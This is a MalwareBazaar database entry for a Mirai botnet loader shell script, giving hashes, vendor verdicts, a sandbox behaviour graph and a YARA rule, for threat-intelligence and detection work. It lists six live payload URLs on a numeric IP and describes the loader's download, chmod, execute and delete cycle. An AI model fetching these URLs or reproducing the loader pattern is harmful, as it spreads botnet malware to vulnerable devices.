MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 a8d35c9ad788b7ce2a5327d4e0716c956bd7310407313c96e378d6549df18acb. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry


Mirai


Vendor detections: 6


Intelligence 6 IOCs YARA 1 File information Comments
Download sample Add tag Delete this sample Report a False Positive

SHA256 hash: a8d35c9ad788b7ce2a5327d4e0716c956bd7310407313c96e378d6549df18acb
SHA3-384 hash: cb8d37098e75e802f4dddf6d3b4952ed4713f1b0bfd21bd2f1c0a4f30864fccab6813ef7345fb8dd4a75bc6226a751a1
SHA1 hash: 3ec917df77e75af1fee9ed296271a39ab05203a1
MD5 hash: 9d0d812c8289022ef6661d245292cd71
humanhash: nine-twelve-beryllium-don
File name:po
Download: download sample
Signature Mirai
Create hunting rule
File size:491 bytes
First seen:2026-01-01 13:36:56 UTC
Last seen:Never
File type: sh
MIME type:text/plain
ssdeep 6:SdVbkbHI67VxKSe3DjdVQlcQhXdVeag7QtvG3VcFGNIF8QdVcf687Qvv0:6GDDm3DjdAMaguiVNIHGk0
TLSH T1AEF05B9F2068EF13C1CC4E567AB6603F547183D91966075AFFE6409B54CD600376CD95
Magika shell
Reporter abuse_ch
Tags:sh
URLMalware sample (SHA256 hash)SignatureTags
http://130.12.180.64/splmips99119aaf01d3b317ca0e6cf7a8912f4980b6071211483242336795337cfe17e0 Miraielf mirai ua-wget
http://130.12.180.64/splmpsl5a11b3bc9145663f668b8124d193fa6035534206318a29b53071c807bfceb2e0 Miraielf mirai ua-wget
http://130.12.180.64/splarmd967f32dac513d1ea8f02c8137174c784fff987c887dff1bf0a2b8178e1624bc Miraielf mirai ua-wget
http://130.12.180.64/splarm557672f91464676b6b331c8ed2dd675eb63d46e42c5e21358eb1ef1bccb5bba68 Miraielf mirai ua-wget
http://130.12.180.64/splarm6b12c8efcac2af8b598c7075aeb2df78e8d373fd27c15013046a4ead6289a5f49 Miraielf mirai ua-wget
http://130.12.180.64/splarm7ccb58d3643e5813f781813ab9e5348702f68b146a93ec3cfb0c35879f0837f17 Miraielf mirai ua-wget

Intelligence

File Origin
# of uploads :
1
# of downloads :
39
Origin country :
DE DE
Vendor Threat Intelligence
No detections
Verdict:
Malicious
Threat level:
  10/10
Confidence:
100%
Tags:
evasive mirai
Link:
https://www.filescan.io/uploads/695691628d1aa9829e28810d/reports/5d5b47e5-2636-4a34-9b12-c4152a152f8b/overview
Verdict:
Unknown
Link:
https://www.hybrid-analysis.com/sample/a8d35c9ad788b7ce2a5327d4e0716c956bd7310407313c96e378d6549df18acb
Verdict:
Malicious
File Type:
text
First seen:
2026-01-01T14:21:00Z UTC
Last seen:
2026-01-02T02:59:00Z UTC
Hits:
~10
Link:
https://opentip.kaspersky.com/a8d35c9ad788b7ce2a5327d4e0716c956bd7310407313c96e378d6549df18acb/results?tab=lookup
Status:
terminated
Link:
https://sandbox.kunai.rocks/analysis/d3fa94cb-dbc5-4354-b5d7-5477b881aa83
Behavior Graph:
Download SVG
%3 guuid=0ac3d5fb-1600-0000-646e-e14e0e0d0000 pid=3342 /usr/bin/sudo guuid=a1382cff-1600-0000-646e-e14e150d0000 pid=3349 /tmp/sample.bin guuid=0ac3d5fb-1600-0000-646e-e14e0e0d0000 pid=3342->guuid=a1382cff-1600-0000-646e-e14e150d0000 pid=3349 execve guuid=776795ff-1600-0000-646e-e14e160d0000 pid=3350 /usr/bin/wget net send-data write-file guuid=a1382cff-1600-0000-646e-e14e150d0000 pid=3349->guuid=776795ff-1600-0000-646e-e14e160d0000 pid=3350 execve guuid=32905006-1700-0000-646e-e14e260d0000 pid=3366 /usr/bin/chmod guuid=a1382cff-1600-0000-646e-e14e150d0000 pid=3349->guuid=32905006-1700-0000-646e-e14e260d0000 pid=3366 execve guuid=a6a20907-1700-0000-646e-e14e290d0000 pid=3369 /usr/bin/dash guuid=a1382cff-1600-0000-646e-e14e150d0000 pid=3349->guuid=a6a20907-1700-0000-646e-e14e290d0000 pid=3369 clone guuid=8f882b07-1700-0000-646e-e14e2a0d0000 pid=3370 /usr/bin/rm delete-file guuid=a1382cff-1600-0000-646e-e14e150d0000 pid=3349->guuid=8f882b07-1700-0000-646e-e14e2a0d0000 pid=3370 execve guuid=93aa9a07-1700-0000-646e-e14e2d0d0000 pid=3373 /usr/bin/wget net send-data write-file guuid=a1382cff-1600-0000-646e-e14e150d0000 pid=3349->guuid=93aa9a07-1700-0000-646e-e14e2d0d0000 pid=3373 execve guuid=d112a20e-1700-0000-646e-e14e3f0d0000 pid=3391 /usr/bin/chmod guuid=a1382cff-1600-0000-646e-e14e150d0000 pid=3349->guuid=d112a20e-1700-0000-646e-e14e3f0d0000 pid=3391 execve guuid=e353060f-1700-0000-646e-e14e410d0000 pid=3393 /usr/bin/dash guuid=a1382cff-1600-0000-646e-e14e150d0000 pid=3349->guuid=e353060f-1700-0000-646e-e14e410d0000 pid=3393 clone guuid=de161a0f-1700-0000-646e-e14e420d0000 pid=3394 /usr/bin/rm delete-file guuid=a1382cff-1600-0000-646e-e14e150d0000 pid=3349->guuid=de161a0f-1700-0000-646e-e14e420d0000 pid=3394 execve guuid=b33b5f0f-1700-0000-646e-e14e430d0000 pid=3395 /usr/bin/wget net send-data write-file guuid=a1382cff-1600-0000-646e-e14e150d0000 pid=3349->guuid=b33b5f0f-1700-0000-646e-e14e430d0000 pid=3395 execve guuid=d73d9317-1700-0000-646e-e14e560d0000 pid=3414 /usr/bin/chmod guuid=a1382cff-1600-0000-646e-e14e150d0000 pid=3349->guuid=d73d9317-1700-0000-646e-e14e560d0000 pid=3414 execve guuid=b5e9e317-1700-0000-646e-e14e580d0000 pid=3416 /usr/bin/dash guuid=a1382cff-1600-0000-646e-e14e150d0000 pid=3349->guuid=b5e9e317-1700-0000-646e-e14e580d0000 pid=3416 clone guuid=0f59f917-1700-0000-646e-e14e590d0000 pid=3417 /usr/bin/rm delete-file guuid=a1382cff-1600-0000-646e-e14e150d0000 pid=3349->guuid=0f59f917-1700-0000-646e-e14e590d0000 pid=3417 execve guuid=71a74b18-1700-0000-646e-e14e5b0d0000 pid=3419 /usr/bin/wget net send-data write-file guuid=a1382cff-1600-0000-646e-e14e150d0000 pid=3349->guuid=71a74b18-1700-0000-646e-e14e5b0d0000 pid=3419 execve guuid=1ad6081d-1700-0000-646e-e14e670d0000 pid=3431 /usr/bin/chmod guuid=a1382cff-1600-0000-646e-e14e150d0000 pid=3349->guuid=1ad6081d-1700-0000-646e-e14e670d0000 pid=3431 execve guuid=ec797a1d-1700-0000-646e-e14e6a0d0000 pid=3434 /usr/bin/dash guuid=a1382cff-1600-0000-646e-e14e150d0000 pid=3349->guuid=ec797a1d-1700-0000-646e-e14e6a0d0000 pid=3434 clone guuid=ce63961d-1700-0000-646e-e14e6b0d0000 pid=3435 /usr/bin/rm delete-file guuid=a1382cff-1600-0000-646e-e14e150d0000 pid=3349->guuid=ce63961d-1700-0000-646e-e14e6b0d0000 pid=3435 execve guuid=67eae51d-1700-0000-646e-e14e6d0d0000 pid=3437 /usr/bin/wget net send-data write-file guuid=a1382cff-1600-0000-646e-e14e150d0000 pid=3349->guuid=67eae51d-1700-0000-646e-e14e6d0d0000 pid=3437 execve guuid=fdfa1123-1700-0000-646e-e14e7e0d0000 pid=3454 /usr/bin/chmod guuid=a1382cff-1600-0000-646e-e14e150d0000 pid=3349->guuid=fdfa1123-1700-0000-646e-e14e7e0d0000 pid=3454 execve guuid=851e4b23-1700-0000-646e-e14e800d0000 pid=3456 /usr/bin/dash guuid=a1382cff-1600-0000-646e-e14e150d0000 pid=3349->guuid=851e4b23-1700-0000-646e-e14e800d0000 pid=3456 clone guuid=7b555523-1700-0000-646e-e14e810d0000 pid=3457 /usr/bin/rm delete-file guuid=a1382cff-1600-0000-646e-e14e150d0000 pid=3349->guuid=7b555523-1700-0000-646e-e14e810d0000 pid=3457 execve guuid=a4629323-1700-0000-646e-e14e830d0000 pid=3459 /usr/bin/wget net send-data write-file guuid=a1382cff-1600-0000-646e-e14e150d0000 pid=3349->guuid=a4629323-1700-0000-646e-e14e830d0000 pid=3459 execve guuid=97d19028-1700-0000-646e-e14e970d0000 pid=3479 /usr/bin/chmod guuid=a1382cff-1600-0000-646e-e14e150d0000 pid=3349->guuid=97d19028-1700-0000-646e-e14e970d0000 pid=3479 execve guuid=d251cf28-1700-0000-646e-e14e990d0000 pid=3481 /usr/bin/dash guuid=a1382cff-1600-0000-646e-e14e150d0000 pid=3349->guuid=d251cf28-1700-0000-646e-e14e990d0000 pid=3481 clone guuid=101ad828-1700-0000-646e-e14e9b0d0000 pid=3483 /usr/bin/rm delete-file guuid=a1382cff-1600-0000-646e-e14e150d0000 pid=3349->guuid=101ad828-1700-0000-646e-e14e9b0d0000 pid=3483 execve guuid=30881429-1700-0000-646e-e14e9c0d0000 pid=3484 /usr/bin/rm guuid=a1382cff-1600-0000-646e-e14e150d0000 pid=3349->guuid=30881429-1700-0000-646e-e14e9c0d0000 pid=3484 execve f22fee75-ab34-540d-95fe-696883c6f4ad 130.12.180.64:80 guuid=776795ff-1600-0000-646e-e14e160d0000 pid=3350->f22fee75-ab34-540d-95fe-696883c6f4ad send: 135B guuid=93aa9a07-1700-0000-646e-e14e2d0d0000 pid=3373->f22fee75-ab34-540d-95fe-696883c6f4ad send: 135B guuid=b33b5f0f-1700-0000-646e-e14e430d0000 pid=3395->f22fee75-ab34-540d-95fe-696883c6f4ad send: 134B guuid=71a74b18-1700-0000-646e-e14e5b0d0000 pid=3419->f22fee75-ab34-540d-95fe-696883c6f4ad send: 135B guuid=67eae51d-1700-0000-646e-e14e6d0d0000 pid=3437->f22fee75-ab34-540d-95fe-696883c6f4ad send: 135B guuid=a4629323-1700-0000-646e-e14e830d0000 pid=3459->f22fee75-ab34-540d-95fe-696883c6f4ad send: 135B
Score:
100%
Verdict:
Malware
File Type:
SCRIPT
Link:
https://malprob.io/report/a8d35c9ad788b7ce2a5327d4e0716c956bd7310407313c96e378d6549df18acb
Detection:
n/a
Link:
https://mwdb.cert.pl/sample/a8d35c9ad788b7ce2a5327d4e0716c956bd7310407313c96e378d6549df18acb/
Threat name:
Document-HTML.Downloader.Heuristic
Create hunting rule
Status:
Malicious
First seen:
2026-01-01 14:20:18 UTC
File Type:
Text (Shell)
AV detection:
8 of 24 (33.33%)
Threat level:
  2/5
Detection(s):
Suspicious file
Link:
https://check.spamhaus.org/check/?searchterm=vdjvzgwxrc344kste7koa4lmsvv5omiea4ytzfxdpdlfjhprrlfq._file
Result
Malware family:
n/a
Score:
  3/10
Tags:
n/a
Link:
https://tria.ge/reports/260106-k6h76sft8f/
Behaviour
Modifies registry class
Suspicious use of SetWindowsHookEx
Enumerates physical storage devices
Please note that we are no longer able to provide a coverage score for Virus Total.
Threat name:
Legit
Score:
0.00
Link:
https://yomi.yoroi.company/submissions/a8d35c9ad788b7ce2a5327d4e0716c956bd7310407313c96e378d6549df18acb

YARA Signatures

MalwareBazaar uses YARA rules from several public and non-public repositories, such as YARAhub and Malpedia. Those are being matched against malware samples uploaded to MalwareBazaar as well as against any suspicious process dumps they may create. Please note that only results from TLP:CLEAR rules are being displayed.

Rule name:MAL_Linux_IoT_MultiArch_BotnetLoader_Generic
Create hunting rule
Author:Anish Bogati
Description:Technique-based detection of IoT/Linux botnet loader shell scripts downloading binaries from numeric IPs, chmodding, and executing multi-architecture payloads
Reference:MalwareBazaar sample lilin.sh

File information

The table below shows additional information about this malware sample such as delivery method and external references.

Web download

Mirai

sh a8d35c9ad788b7ce2a5327d4e0716c956bd7310407313c96e378d6549df18acb

(this sample)

Mirai

elf 6a723606451bad90ad32d966dbc3aac92576faeef65e1f390dc493642551da58

  
URLhaus
https://urlhaus.abuse.ch/url/3740314/
  
Delivery method
Distributed via web download
  
Dropping
MD5 f38937ffa8d7e34c256aa4a5fb825496
  
Dropping
SHA256 6a723606451bad90ad32d966dbc3aac92576faeef65e1f390dc493642551da58

Comments